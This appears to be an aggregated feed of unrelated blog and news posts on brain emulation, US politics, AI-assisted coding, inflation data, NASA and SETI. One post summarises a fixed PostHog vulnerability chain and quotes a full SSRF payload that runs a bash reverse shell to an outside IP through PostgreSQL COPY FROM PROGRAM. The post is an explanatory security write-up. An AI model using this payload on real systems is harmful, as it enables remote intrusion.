What Seung did not reveal to the audience is that the fly connectome has given rise to his own new neuroscience journey. This week, he’s unveiling a start-up called Memazing, as we can exclusively report. The new company seeks to create the technology needed to reverse engineer the fly brain (and eventually even more complex brains) and create full recreations – or emulations, as Seung calls them - of the brain in software.

(Seung says the Memazing name is a play on “amazing memory” and the idea that the connectome is the “me maze” in the sense that our thoughts memories are built and stored in the maze of synaptic connections.)

Seung contends that he’s chasing a new approach to understanding the nature of intelligence that’s in many ways opposite to the AI models that have arisen over the past few years. The AI models feed tens of thousands of processors with examples of intelligent behavior – such as huge volumes of text – and then tune the strengths of the relationships between the processors through repeated statistical optimization until intelligent behavior emerges.

Memazing, by contrast, has an existing map of how nature has produced intelligence over the course of millions of years of fine-tuning. It can see the strengths of the connections between neurons. Seung has already taken that information, inputted it into a computer model with great precision and begun to run experiments on that digital brain to see if he can stimulate the emulation and have it act like a real brain.

“We know that flies can see motion, run away from large objects and navigate,” Seung says. “We have to put the synapse counts in as weights and find out which other parameters we have to fiddle with in order to get the right actions to come out.

“If we did the simulation right, then hopefully intelligence will emerge.”

Subscribe now

It’s early days for Memazing. Seung has assembled a team of a few people and is currently in the process of raising funds for his new venture. He’s also not alone. Over the past few weeks, I’ve caught word of at least two other connectome specialists hoping to spin up new companies that also want to use the fly data to try and build digital minds.

Whether this approach to engineering intelligence results in something spectacular is anyone’s guess. The people chasing this type of work, though, are hoping that knowledge gleaned from animal brains could translate into better AI systems. Animal brains, fed by a relatively small number of calories, remain far more efficient at processing information than the massive data centers fueling AI models. Perhaps emulating the fly brain will help unlock more clues about how animal brains do their work so well.

“The cost of AI has a lot of important implications,” Seung says. “It’s the difference between an AI that’s really centralized and requires a huge amount of investment and is controlled by a few corporations as opposed to AI everywhere. Intelligence too cheap to meter, right? I think slashing the cost of AI is one of the big motivations for us right now.”

On another front, people argue that understanding animal brains better could allow us to create tighter alignment between human and artificial intelligences. We could somehow bake humanness into AIs, and the AIs would then be more inclined to work with us instead of against us. More on the sci-fi spectrum, a number of people hope that the creation of these digitized brains could make it more feasible to upload minds into silicon substrates so that we might, well, live forever.

Seung and fellow neuroscientist Doris Tsao at the salon

“The ultimate goal, of course, is to enable and power humanity to transcend biology,” Seung says. “So human brain emulation is the ultimate goal of the quest.”

Scientists created a full connectome of a worm brain about 40 years ago. It took decades to produce a connectome for the more complex fly brain, in part, because of the painstaking nature of the work. Connectomes are built by shaving off incredibly thin slices of brains, imaging the slices under electron microscopes and then reassembling the images via software into 3D models. Once you have the model, you then must trace and label the wiring of neurons and synapses, which is another brutal task. The human brain, for example, has millions of miles of wiring compacted into a skull-sized case, and you have to make sense of that entangled mess and produce a readable map.

Seung and his team pioneered a number of techniques to use AI software to help label the neurons and synapses of the fly brain. Several start-ups and research organizations are now trying to develop new imaging and labeling techniques in a bid to make building maps of things like mouse and human brains easier. Seung hopes that this influx of new data will accelerate his own work, although it’s possible that the fly connectome could provide enough information to make great leaps forward.

“Ideally, we’ll get human brain emulation when the human connectome is done,” he says. “But it could be the case that we find the principles of brain emulation with small brains and scale them up.”

Seung and his team have already begun work on their fly brain emulation, and they have started connecting their model to a simple robotics system. Over time, they would like to stimulate their digitized brain and see if it produces the right physical reaction in their robots. If, for example, you mimic coming at the fly with a swatter, can you get the robot to try and fly away.

Kenneth Hayworth, a neuroscientist at the Janelia Research Campus, cautioned that Seung and others have a lot of effort ahead of them. “With the fruit fly, we really do have all the hooks that would be necessary to really understand it,” he says. “But I still think it’s a long way off. Neuroscience is extremely difficult. When you push up against experimentation, things tend to fall apart in weird ways. I think it will take quite some time to develop a full understanding of how the fruit fly works.”

That said, Hayworth encouraged this type of research and said it’s exactly where scientists should be going with the fly connectome in hand. “Drosophila is an excellent target for the type of basic neuroscience that we need,” he says. “We are on that long road to eventually understanding brains and to do mind uploading. It will succeed eventually, but it will take a long time – maybe a hundred years.”

Seung is accustomed to facing some measure of skepticism around his work. Neuroscientists spent years questioning the value of creating animal connectomes. The brain maps only capture a single moment in time of a dead animal. We would learn far more about how the brain works by observing its behavior in real-time, although such research is very hard to do in practice.

The creation of the fly connectome, however, has justified much of Seung’s faith in this field of study as all types of new insights about the brain have appeared over the past year. Seung expects that new data and new insights will come at a steady pace as advances in AI and neuroscience play off each other.

“The connectomes are scaling up, and the data from academic labs and start-ups is growing exponentially,” Seung said. “We’re going to have all this fuel in which to feed the brain emulations because of all this commercialization going on.”

Share

Why Trump’s Viciousness Matters

My first reaction upon reading Donald Trump’s despicable statement on the murders of Rob Reiner and his wife Michele was a sense of both shock and lack of surprise. It wasn’t news to me that the president of the United States is a vicious shmuck. My second reaction was the thought that I have nothing new to contribute here, as plenty of other people were already denouncing yet another example of Trump’s vindictive narcissism.

Yet, on reflection, I realized that there’s a story here that’s bigger than Trump, a story in which Trump is one especially egregious example of a larger pattern. What is that pattern? That being vicious and bigoted is cool, is based in current slang. Trump is one data point in the midst of an epidemic of performative hatemongering in America. And while most of this is emanating from right-wing extremists, not all of it is.

I am not going to present some rose-tinted, Pollyannaish view of America’s past here. There were people who crowed over the assassination of Martin Luther King Jr. For most of our history there were Americans who reveled in harming, subjugating and dispossessing those who were considered of the wrong race, ethnicity, religion, sexual orientation or gender identity. But we, as a country, changed. Over time, Americans on the whole became more humane and tolerant.

It’s true that significant numbers of Americans were never fully on board with liberal humanism. For example, a majority of white American’s didn’t approve of interracial marriage until 1997. However, we were slowly becoming a country in which open bigotry was frowned upon. Although we were never perfect, there was a growing sense of norms that contained any underlying hatred.

Now the impulse to hate is back. For example, according to a long-running survey conducted by NORC and the ADL, antisemitism has been making a big comeback:

Antisemitic Attitudes in America 2024

Source

And Trump has made innumberable crudely racist comments about Black Americans, particularly about Black American women. He’s demonized immigrants and Muslims, and suggested Democratic politicians should be executed. But the resurgence of hate speech isn’t just about Trump, nor is it solely about politics. Grown men — it’s mostly, although not only, men — now feel free to be publicly cruel and vindictive, spouting childish insults against whomever they dislike.

Why is this happening? The rise of social media is one significant factor in making it far easier for the like-minded to find one another and magnify their hate.

The app formerly known as Twitter is thoroughly infested with bigots and bots, and all too many people who immerse themselves in that toxic environment end up internalizing the viciousness. Even right-wing activists like Chris Rufo are complaining that X has been “increasingly hijacked by bad actors who peddle baseless conspiracies and indulge their personal psychopathologies.” And G. Elliott Morris’s Substack “Strength in Numbers” has an excellent post on how Fox News polarized American voters and helped break American politics.

However, media alone are not to blame. I’ve been reading the British economist Simon Wren-Lewis, who has been writing about “the growing acceptability of xenophobic discourse” in the UK. His thesis is that there have always been a substantial number of people in Britain — and, surely, in every Western nation — who are socially reactionary and racist. In the past, however, mainstream political parties refused to associate themselves with anyone espousing such views. Eventually the cynical search for votes led to a breakdown of this cordon sanitaire — the Germans call their equivalent the Brandmauer, or firewall — and the latent viciousness broke into the open.

In a follow-up post Wren-Lewis, citing the work of the political scientist Vicente Valentim, acknowledges thatbroader social norms, largely established after World War II, also made overt racism and other forms of bigotry unacceptable in the public sphere. Even people who were privately cruel and bigoted – some of them in influential positions – felt obliged to be hypocrites and hide their true nature.

In time, however, events, ranging from the Syrian refugee crisis in Germany to the election of America’s first Black president, loosened the grip of these social norms. The already-existing pool of cruelty and bigotry, which had previously been veiled by hypocrisy, came back into full view.

A similar phenomenon is occurring in the US, where some Trump supporters are gleeful that Trump’s presidency will allow them to drop the veil of hypocrisy. For example, the Financial Times reported on the reasons some on Wall Street were welcoming Trump’s return:

“I feel liberated,” said a top banker. “We can say ‘retard’ and ‘pussy’ without the fear of getting cancelled . . . it’s a new dawn.”

But where I would differ from Wren-Lewis’s analysis — although I’m not sure Simon would disagree — is that he implicitly treats the number of reactionaries and bigots as immutable. In fact, as G. Elliott Morris likes to point out, ordinary voters’ positions on issues — and, I’d argue, elites’ positions too — are far less fixed than political strategists tend to assume. They can and do shift greatly based on what people hear.

If this is true, then the world in which we lived until recently was a world in which the general public was steered away from the worst bigotry because, over time, it had been made socially unacceptable. Yes, there was substantial hypocrisy lurking below the surface, but the hypocrisy was a useful tool that reduced the amount of violent and hate-filled rhetoric.

Now, Trump is purposely breaking norms and engaging in open expressions of hate and bigotry. And among a set of people, this serves as a signal that it’s now socially acceptable to do the same – look, for example, atthe extremely racist and Nazi-praising chats among young Republican activists leaked to Politico. While these young MAGA-landers were outed and chastised, it’s clear that within MAGA-world emulating Trump’s hate-filled rhetoric is considered a way of signaling that you are loyal to the movement.

And it’s also clear that if Trumpism persists, we are facing a future in which such behavior is no longer publicly unacceptable. Because Trump’s remarks about the murder of the Reiners weren’t just his personal venting. They were a symptom and a symbol of his systematic destruction of our norms, our humanism, just as he tried to destroy the norms of American democracy on January 6, 2021. It’s a profoundly nihilistic vision for America.

And one of these days, I predict, history will judge harshly those who stayed silent.

Addendum: Trump gave a speech on the economy last night. It was nasty, brutish but mercifully short. It was, of course, full of lies. Were there any true factual claims? So far I haven’t found any. And it closed out with ugly claims about immigrants. A few more words about it tomorrow.

MUSICAL CODA

Your job is to deliver code you have proven to work

In all of the debates about the value of AI-assistance in software development there's one depressing anecdote that I keep on seeing: the junior engineer, empowered by some class of LLM tool, who deposits giant, untested PRs on their coworkers - or open source maintainers - and expects the "code review" process to handle the rest.

This is rude, a waste of other people's time, and is honestly a dereliction of duty as a software developer.

Your job is to deliver code you have proven to work.

As software engineers we don't just crank out code - in fact these days you could argue that's what the LLMs are for. We need to deliver code that works - and we need to include proof that it works as well. Not doing that directly shifts the burden of the actual work to whoever is expected to review our code.

How to prove it works

There are two steps to proving a piece of code works. Neither is optional.

The first is manual testing. If you haven't seen the code do the right thing yourself, that code doesn't work. If it does turn out to work, that's honestly just pure chance.

Manual testing skills are genuine skills that you need to develop. You need to be able to get the system into an initial state that demonstrates your change, then exercise the change, then check and demonstrate that it has the desired effect.

If possible I like to reduce these steps to a sequence of terminal commands which I can paste, along with their output, into a comment in the code review. Here's a recent example.

Some changes are harder to demonstrate. It's still your job to demonstrate them! Record a screen capture video and add that to the PR. Show your reviewers that the change you made actually works.

Once you've tested the happy path where everything works you can start trying the edge cases. Manual testing is a skill, and finding the things that break is the next level of that skill that helps define a senior engineer.

The second step in proving a change works is automated testing. This is so much easier now that we have LLM tooling, which means there's no excuse at all for skipping this step.

Your contribution should bundle the change with an automated test that proves the change works. That test should fail if you revert the implementation.

The process for writing a test mirrors that of manual testing: get the system into an initial known state, exercise the change, assert that it worked correctly. Integrating a test harness to productively facilitate this is another key skill worth investing in.

Don't be tempted to skip the manual test because you think the automated test has you covered already! Almost every time I've done this myself I've quickly regretted it.

Make your coding agent prove it first

The most important trend in LLMs in 2025 has been the explosive growth of coding agents - tools like Claude Code and Codex CLI that can actively execute the code they are working on to check that it works and further iterate on any problems.

To master these tools you need to learn how to get them to prove their changes work as well.

This looks exactly the same as the process I described above: they need to be able to manually test their changes as they work, and they need to be able to build automated tests that guarantee the change will continue to work in the future.

Since they're robots, automated tests and manual tests are effectively the same thing.

They do feel a little different though. When I'm working on CLI tools I'll usually teach Claude Code how to run them itself so it can do one-off tests, even though the eventual automated tests will use a system like Click's CLIRunner.

When working on CSS changes I'll often encourage my coding agent to take screenshots when it needs to check if the change it made had the desired effect.

The good news about automated tests is that coding agents need very little encouragement to write them. If your project has tests already most agents will extend that test suite without you even telling them to do so. They'll also reuse patterns from existing tests, so keeping your test code well organized and populated with patterns you like is a great way to help your agent build testing code to your taste.

Developing good taste in testing code is another of those skills that differentiates a senior engineer.

The human provides the accountability

A computer can never be held accountable. That's your job as the human in the loop.

Almost anyone can prompt an LLM to generate a thousand-line patch and submit it for code review. That's no longer valuable. What's valuable is contributing code that is proven to work.

Next time you submit a PR, make sure you've included your evidence that it works as it should.

Tags: programming, careers, ai, generative-ai, llms, ai-assisted-programming, ai-ethics, vibe-coding, coding-agents

Inside PostHog: How SSRF, a ClickHouse SQL Escaping 0day, and Default PostgreSQL Credentials Formed an RCE Chain

Inside PostHog: How SSRF, a ClickHouse SQL Escaping 0day, and Default PostgreSQL Credentials Formed an RCE Chain

Mehmet Ince describes a very elegant chain of attacks against the PostHog analytics platform, combining several different vulnerabilities (now all reported and fixed) to achieve RCE - Remote Code Execution - against an internal PostgreSQL server.

The way in abuses a webhooks system with non-robust URL validation, setting up a SSRF (Server-Side Request Forgery) attack where the server makes a request against an internal network resource.

Here's the URL that gets injected:

http://clickhouse:8123/?query=SELECT++FROM+postgresql('db:5432','posthog',\"posthog_use'))+TO+STDOUT;END;DROP+TABLE+IF+EXISTS+cmd_exec;CREATE+TABLE+cmd_exec(cmd_output+text);COPY+cmd_exec+FROM+PROGRAM+$$bash+-c+\\"bash+-i+>%26+/dev/tcp/172.31.221.180/4444+0>%261\\"$$;SELECT++FROM+cmd_exec;+--\",'posthog','posthog')#

Reformatted a little for readability:

http://clickhouse:8123/?query=
SELECT *
FROM postgresql(
    'db:5432',
    'posthog',
    "posthog_use')) TO STDOUT;
    END;
    DROP TABLE IF EXISTS cmd_exec;
    CREATE TABLE cmd_exec (
        cmd_output text
    );
    COPY cmd_exec
    FROM PROGRAM $$
        bash -c \"bash -i >& /dev/tcp/172.31.221.180/4444 0>&1\"
    $$;
    SELECT * FROM cmd_exec;
    --",
    'posthog',
    'posthog'
)
#

This abuses ClickHouse's ability to run its own queries against PostgreSQL using the postgresql() table function, combined with an escaping bug in ClickHouse PostgreSQL function (since fixed). Then that query abuses PostgreSQL's ability to run shell commands via COPY ... FROM PROGRAM.

The bash -c bit is particularly nasty - it opens a reverse shell such that an attacker with a machine at that IP address listening on port 4444 will receive a connection from the PostgreSQL server that can then be used to execute arbitrary commands.

Via Hacker News

Tags: postgresql, security, webhooks, clickhouse

AoAH Day 15: Porting a complete HTML5 parser and browser test suite

AoAH Day 15: Porting a complete HTML5 parser and browser test suite

Anil Madhavapeddy is running an Advent of Agentic Humps this year, building a new useful OCaml library every day for most of December.

Inspired by Emil Stenström's JustHTML and my own coding agent port of that to JavaScript he coined the term vibespiling for AI-powered porting and transpiling of code from one language to another and had a go at building an HTML5 parser in OCaml, resulting in html5rw which passes the same html5lib-tests suite that Emil and myself used for our projects.

Anil's thoughts on the copyright and ethical aspects of this are worth quoting in full:

The question of copyright and licensing is difficult. I definitely did some editing by hand, and a fair bit of prompting that resulted in targeted code edits, but the vast amount of architectural logic came from JustHTML. So I opted to make the LICENSE a joint one with Emil Stenström. I did not follow the transitive dependency through to the Rust one, which I probably should.

I'm also extremely uncertain about every releasing this library to the central opam repository, especially as there are excellent HTML5 parsers already available. I haven't checked if those pass the HTML5 test suite, because this is wandering into the agents vs humans territory that I ruled out in my groundrules. Whether or not this agentic code is better or not is a moot point if releasing it drives away the human maintainers who are the source of creativity in the code!

I decided to credit Emil in the same way for my own vibespiled project.

Via @avsm

Tags: definitions, functional-programming, ai, generative-ai, llms, ai-assisted-programming, ai-ethics, vibe-coding, ocaml

Meet the American investors rushing into Congo

They are taking on war, corruption and China

This Christmas, raise a glass to concentrated market returns

A surprisingly large share of companies lag far behind their former greatness

YoY Measures of Inflation: Services, Goods and Shelter

SPECIAL NOTE: October prices (data not collected) were averaged between September and November for these graphs.

Here are a few measures of inflation:

The first graph is the one Fed Chair Powell had mentioned two years ago as something to watch.  

Services ex-ShelterClick on graph for larger image.

This graph shows the YoY price change for Services and Services less rent of shelter through August 2025.

Services were up 3.2% YoY as of November 2025, down from 3.6% YoY in September.

Services less rent of shelter was up 3.5% YoY in November, down from 3.7% YoY in September..

Goods CPIThe second graph shows that goods prices started to increase year-over-year (YoY) in 2020 and accelerated in 2021 due to both strong demand and supply chain disruptions.

Now the YoY change in prices is increasing due to tariffs.

Durables were up 1.5% YoY as of November 2025, down from 1.8% YoY in September.

Commodities less food and energy commodities were at 1.4% YoY in November, down from 1.5% YoY in September.

ShelterHere is a graph of the year-over-year change in shelter from the CPI report (through November) and housing from the PCE report (through September)

Shelter was up 3.0% year-over-year in November, down from 3.6% in September. Housing (PCE) was up 3.4% YoY in September, down from 3.9% in August.

This is still catching up with private new lease data (this includes renewals whereas private data is mostly for new leases).

Core CPI ex-shelter was up 2.3% YoY in November, down from 2.6% YoY in September.

Weekly Initial Unemployment Claims Decrease to 224,000

The DOL reported:
In the week ending December 13, the advance figure for seasonally adjusted initial claims was 224,000, a decrease of 13,000 from the previous week's revised level. The previous week's level was revised up by 1,000 from 236,000 to 237,000. The 4-week moving average was 217,500, an increase of 500 from the previous week's revised average. The previous week's average was revised up by 250 from 216,750 to 217,000.
emphasis added
The following graph shows the 4-week moving average of weekly claims since 1971.

Click on graph for larger image.

The dashed line on the graph is the current 4-week average. The four-week average of weekly unemployment claims increased to 217,500.

BLS: CPI Increased 0.2% Over 2 Months; Core CPI increased 0.2%

From the BLS:
The Consumer Price Index for All Urban Consumers (CPI-U) increased 0.2 percent on a seasonally adjusted basis over the 2 months from September 2025 to November 2025, the U.S. Bureau of Labor Statistics reported today. Over the last 12 months, the all items index increased 2.7 percent before seasonal adjustment. BLS did not collect survey data for October 2025 due to a lapse in appropriations.

The seasonally adjusted index for all items less food and energy rose 0.2 percent over the 2 months ending in November. From September to November, the index for shelter increased 0.2 percent. The energy index rose 1.1 percent over the same 2-month period and the food index increased 0.1 percent. Other indexes which increased over the 2 months ending in November include household furnishings and operations, communication, and personal care. In contrast, the indexes for lodging away from home, recreation, and apparel decreased over the same 2-month period.

The all items index rose 2.7 percent for the 12 months ending November, after rising 3.0 percent over the 12 months ending September. The all items less food and energy index rose 2.6 percent over the last 12 months. The energy index increased 4.2 percent for the 12 months ending November. The food index increased 2.6 percent over the last year.
emphasis added
The change in CPI was below expectations. I'll post a graph later today after the Cleveland Fed releases the median and trimmed-mean CPI.

Watch who you’re calling childless

Women in America are having as many babies over their lifetimes as they did two decades ago

Senate confirms Jared Isaacman as 15th NASA Administrator

Jared Isaacman, President Donald Trump’s nominee to be the next administrator of NASA, appears before the Senate Committee on Commerce, Science, and Transportation, Wednesday, Dec. 3, 2025, at the Russell Senate Office Building in Washington. Image: NASA/Joel Kowsky

Jared Isaacman was confirmed by the U.S. Senate to be NASA’s newest administrator on Wednesday afternoon.

The commercial astronaut, entrepreneur, and philanthropist received 67 votes of approval with 30 senators voting against his confirmation.

“For nearly 70 years, the United States has been at the forefront of space exploration. President Trump knows how critical it is to reinvigorate NASA as we aim to reach new heights in the greatest frontier ever known, and that’s why he chose exactly the right man for the job,” wrote Sen. Tim Sheehy (R-MT) in a social media post shortly after the vote.

“I’m proud to see [Jared Isaccman] confirmed as our NASA administrator and confident he will work tirelessly to ensure America wins the 21st century space race.”

Messages of support came in swiftly for Isaacman, ranging from industry members to special interest groups, like the American Institute for Aeronautics and Astronautics and the Planetary Society.

“After nearly a year of historic disruptions to the agency’s workforce, facilities, and budget, Mr. Isaacman has the opportunity to stabilize and reinvigorate the U.S. space program,” the Planetary Society wrote in a social media statement. “Congress is on a path to provide Mr. Isaacman with a restored budget that better funds national priorities: returning humans to the Moon, maintaining U.S. leadership in space science and exploration, and training the next generation of scientists and aerospace engineers.

“This is a remarkable statement of support for NASA’s mission, and Mr. Isaacman publicly committed to make full use of the funds that Congress provides.”

A date for Isaacman’s official swearing in ceremony hasn’t been announced, but is expected soon, potentially before the Christmas holiday.

Isaacman was first announced as President Donald Trump’s pick for the position of NASA Administrator on Dec. 4, 2024, and sat for his first confirmation hearing on April 9.

About a month and a half later, the President withdrew that nomination amid the backdrop of a very public falling out with SpaceX founder and one of Trump’s biggest political donors, Elon Musk.

Isaacman was renominated to the position on Nov. 4 and had a second confirmation hearing less than a month later.

Secretary of Transportation Sean Duffy was named acting administrator replacing the interim Administrator, Janet Petro, who returned to her role as director of the Kennedy Space Center in Florida.

“Congratulations to Jared Isaacman on his confirmation as NASA Administrator,” Duffy wrote in a social media post. “It’s been an honor to help drive [The President’s]’ vision for American leadership in space. I wish Jared success as he begins his tenure and leads NASA as we go back to the Moon in 2028 and beat China.”

A busy time ahead

Isaacman will step into the Administrator role at an inflection point for the agency with Congress and the Trump Administration pushing different directions for the agency. Also a reduction in the NASA workforce and brutal budget cuts will create a challenging environment.

Most immediately, NASA is on the cusp of launching the Artemis 2 mission, the first crewed flight of the Orion spacecraft, which will fly around the Moon and back to Earth on a 10-day mission, as soon as early February.

From left, Sean McCrary and Katie Mortensen, mechanical engineering technicians, paint NASA’s Artemis logo on the White Room connected to the crew access arm and mobile launcher inside the Vehicle Assembly Building at NASA’s Kennedy Space Center in Florida on Thursday, Dec. 4, 2025. The White Room is the area where the Artemis 2 crew Reid Wiseman, Victor Glover, Christina Koch, and CSA (Canadian Space Agency) astronaut Jeremy Hansen will enter the Orion spacecraft ahead of launch from Launch Complex 39B at NASA Kennedy in early 2026. Image: NASA/Frank Michaux

Across his two confirmation hearings, Isaacman faced numerous questions about his views on the Artemis program, which uses the Space Launch System (SLS) rocket and Orion spacecraft for lunar expeditions.

In his list of questions for the record following Isaacman’s second nomination hearing, Sen. Katie Britt (R-AL) pushed Isaacman on his support for using the SLS rocket through the Artemis 5 mission. She noted that he’d previously talked about the potential for using commercial heavy lift rockets on the Artemis 4 and Artemis 5 missions.

“SLS is the fastest path to achieving America’s near-term lunar objectives through Artemis 5,” Isaacman wrote in response. “Pivoting to another architecture earlier than contemplated in the One Big Beautiful Bill could place the nation at an unacceptable risk of a strategic capability gap. I will, of course, follow the law.”

On the other side of the aisle, Sen. Maria Cantwell (D-WA) asked Isaacman about the initiative started by Duffy to reopen the competition for the Artemis 3 Human Landing System (HLS) contract. NASA confirmed that it had received proposals for expedited landing options from SpaceX and Blue Origin and would see input from the broader industry in time.

“If confirmed, I fully intend to solicit feedback from all commercial partners on ways to reduce requirements and remove obstacles that impede America’s near-term lunar objectives,” Isaacman wrote in response. “This applies not only to Blue Origin and SpaceX, but to Lockheed Martin, Boeing, Northrop, and every other vendor contributing to Artemis and NASA’s broader mission.

“As I stated during the hearing, America is best served when both HLS providers are able to compete–and as a nation, we must select the first landing system ready to ensure the United States returns to the Moon before China.”

An artist’s rendering of the Human Landing System version of Starship docking with NASA’s Orion spacecraft in lunar orbit. Graphic: SpaceX

Isaacman also faces challenges with NASA’s science budget. The President’s Budget Request, issued earlier this year, proposed deep cuts to science, with the Earth science portion taking a heavy reduction.

Asked by Sen. Dan Sullivan (R-AK) about the President’s proposal to eliminate the Office of STEM Engagement (OSTEM) and reduce the funding to the NASA Research Opportunities in Space and Earth Sciences (ROSES) program, Isaacman said the following:

“If confirmed, I can commit to being an advocate for science and a strong American workforce and will do all I can to maximize the scientific value of every dollar provided by Congress.”

New Uses for the Eschaton

New Uses for the Eschaton

One way to examine problems with huge unknowns – SETI is a classic example – is through the construction of a so-called ‘toy model.’ I linger a moment on the term because I want to purge the notion that it infers a lightweight conclusion. A toy model simplifies details to look for the big picture. It can be a useful analytical tool, a way of screening out some of the complexities in order to focus on core issues. And yes, it’s theoretical and idealized, not predictive.

But sometimes a toy model offers approaches we might otherwise miss. Consider how many variables we have to work with in SETI. What kind of signaling strategy would an extraterrestrial civilization choose? What sort of timeframe would it operate under? What cultural values determine its behavior? What is its intent? You can see how long this list can become. I’ll stop here.

The toy model I want to focus on today is one David Kipping uses in a new paper called “The Eschatian Hypothesis.” The term refers to what we might call ‘final things.’ Eschaton is a word that turns up in both cosmology and theology, in the former case talking about issues like the ultimate fate of the cosmos. So when Kipping (Columbia University) uses it in a SETI context, he’s going for the broadest possible approach, the ‘big picture’ of what a detection would look like.

I have to pause here for a moment to quote science fiction writer Charles Stross, who finds uses for ‘eschaton’ in his Singularity Sky (Ace, 2004), to wit:

I am the Eschaton. I am not your God.
I am descended from you, and exist in your future.
Thou shalt not violate causality within my historic light cone. Or else.

Love the ‘or else.’

Let’s now dig into the new paper. Published in Research Notes of the AAS, the paper homes in on a kind of bias that haunts our observations. Consider that the first exoplanets ever found were at the pulsar PSR 1257+12. Or the fact that the first main sequence star with a planet was found to host a ‘hot Jupiter,’ which back in 1995, when 51 Pegasi b was discovered, wasn’t even a category anyone ever thought existed. The point is that we see the atypical first precisely because such worlds are so extreme. While our early population of detections is packed with hot Jupiters, we have learned that these worlds are in fact rarities. We begin to get a feel for the distribution of discoveries.

Hot Jupiters, in other words, are ‘loud.’ They’re the easiest of all radial velocity planet signatures to find. And yet they make up less than one percent of the exoplanets we’ve thus far found. The issue is broad. From the paper:

…over-representation of unusual astronomical phenomena in our surveys is not limited to exoplanetary science. One merely needs to look up at the night sky to note that approximately a third of the naked-eye stars are evolved giants, despite the fact less than one percent of stars are in such a state—a classic observational effect known as Malmquist bias (K. G. Malmquist 1922). Or consider that a supernova is expected roughly twice per century in Milky Way-sized galaxies (G. A. Tammann et al. 1994)—an astoundingly rare event. And yet, despite being an inherently rare type of transient, astronomers routinely detect thousands of supernovae every year (M. Nicholl 2021), as a product of their enormous luminosities.

That’s quite a thought. Go for a walk on a clear winter evening and look up. So many of the stars you’re seeing are giants in the terminal stages of their lifetimes. Those we can see at great range, but our nearest star, Proxima Centauri, demands a serious telescope for us to be able to see it. So we can’t help the bias that sets in until we realize how much of what we are seeing is rare. Sometimes we have to step back and ask ourselves why we are seeing it.

In SETI terms, Kipping steps back from the question to ask whether the first signatures of ETI, assuming one day they appear, will not be equally ‘loud,’ in the same way that supernovae are loud but actually quite rare. We might imagine a galaxy populated by stable, quiescent populations that we are not likely to see, cultures whose signatures are perhaps already in our data and accepted as natural. These are not the civilizations we would expect to see. What we might detect are the outliers, unstable cultures breaking into violent disequilibrium at the end of their lifetimes. These, supernova style, would be the ones that light up our sky.

Kipping’s toy model works on variables of average lifetime and luminosity, examining the consequences on detectability. A loud civilization is one that becomes highly visible for a fraction of its lifetime before going quiet for the rest. The model’s math demonstrates that a civilization that is 100 times louder than its peers – through any kind of disequilibrium with its normal state, as for example nuclear war or drastic climate change – becomes 1000 times more detectable. A supernova is incredibly rare, but also incredibly detectable.

Image: The toy model at work. This is from Kipping’s Cool Worlds video on the Eschatian Hypothesis.

The Eschatian search strategy involves wide-field, high cadence surveys. In other words, observe at short intervals and keep observing with rapid revisit times to the same source. A search like this is optimized for transients, and the author points out that a number of observatories and observing programs are “moving toward a regime where the sky is effectively monitored as a time-domain data set.” The Vera Rubin Observatory moves in this direction, as does PANOPTES (Panoptic Astronomical Networked Observatories for a Public Transiting Exoplanet Survey). The latter is not a SETI program, but its emphasis on short-duration, repeatable events falls under the Eschatian umbrella.

Rather than targeting narrowly defined technosignatures, Eschatian search strategies would instead prioritize broad, anomalous transients—in flux, spectrum, or apparent motion—whose luminosities and timescales are difficult to reconcile with known astrophysical phenomena. Thus, agnostic anomaly detection efforts (e.g., D. Giles & L. Walkowicz 2019; A. Wheeler & D. Kipping 2019) would offer a suggested pathway forward.

I’ve often imagined the first SETI detection as marking a funeral beacon, though likely not an intentional one. The Eschatian Hypothesis fits that thought nicely, but it also leaves open the prospect of what we may not detect until we actually go into the galaxy, the existence of civilizations whose lifetimes are reckoned in millions of years if not more. The astronomer Charles Lineweaver has pointed out that most of our galaxy’s terrestrial-class worlds are two billion years older than Earth. Kipping quotes the brilliant science fiction writer Karl Schroeder when he tunes up an old Arthur Clarke notion: Any sufficiently advanced civilization will be indistinguishable from nature. Stability infers coming to terms with societal disintegration and mastering it.

Cultures like that are going to be hard to distinguish from background noise. We’re much more likely to see a hard-charging, shorter-lived civilization meeting its fate.

The paper is Kipping, “The Eschatian Hypothesis,” Research Notes of the AAS Vol. 9, No. 12 (December, 2025), 334. Full text.

Economics job market update

From John A. List:

AEA job market update. The numbers don’t lie, as this is the toughest market for PhD economists in recent memory.

JOE listings are down 20% from last year. Worse: they are 19% below COVID levels. Let that sink in.

The academic market took the biggest hit. Full-time US positions dropped 33% year-over-year. Liberal arts colleges and PhD-granting universities? Both down about a third. International academic postings fell 13% from last year, 25% from COVID.

Nonacademic isn’t much better: down 27% from last year, 45% below COVID. And federal government hiring? That’s where it gets ugly. Down 71% year-over-year, 79% below COVID. DOGE cuts plus the shutdown created a perfect storm.

One bright spot: private sector jobs in consulting, research, banking, and finance are holding steady at recent-year levels.

Bottom line for candidates: the data confirm what you’re feeling. It’s brutal out there. Universities facing their own financial pressures should still find ways to bridge unmatched candidates for another year. The talent is there—the opportunities aren’t. H/T John Cawley

Here is the link to the tweet.

The post Economics job market update appeared first on Marginal REVOLUTION.

       

Comments

Related Stories

 

IBR: Still hiding–and lying about–coming billions in cost overruns

Once again, the Interstate Bridge Replacement Project has blown through a deadline to report a new, much higher cost for this huge project.

They’ve now delayed for two full years telling lawmakers and the public how much the project will cost, and it seems certain to approach $10 billion.

Not only that, but IBR officials flip-flopped on the need for a delay.  In September, they testified to legislators that they could easily produce a new estimate without knowing whether the Coast Guard would require a higher navigation clearance; now they’re saying they have to wait until the Coast Guard renders a decision.

IBR officials remain evasive about when a new cost estimate will be revealed, hinting in may take weeks or as much as two months after the Coast Guard decision is rendered.  It seems likely that IBR will delay releasing a new estimate until after both the Oregon and Washington legislatures have adjourned their 2026 sessions in early March.

In truth, IBR actually knows within a reasonable range how much the project will cost:  it has had a well-financed group of staff and consultants working on project cost estimating for the past five years.  It’s using the Coast Guard process as an excuse to avoid delivering bad–and likely very bad–news about the exploding cost of this mega-project.

 

The Oregon and Washington highway departments have a huge problem–a ten billion dollar problem.  They’ve been working for years on a new cost estimate for the gargantuan Interstate Bridge Replacement Project.  In 2022, state officials said the project would cost $5 to $7.5 billion.  For the past 24 months, they’ve acknowledged that estimate is too low, and they’ve repeatedly said they would release a new cost estimate “real soon.”  They were scheduled to release a new cost estimate on December 15, but are now saying we’ll all have to wait until sometime in 2026.

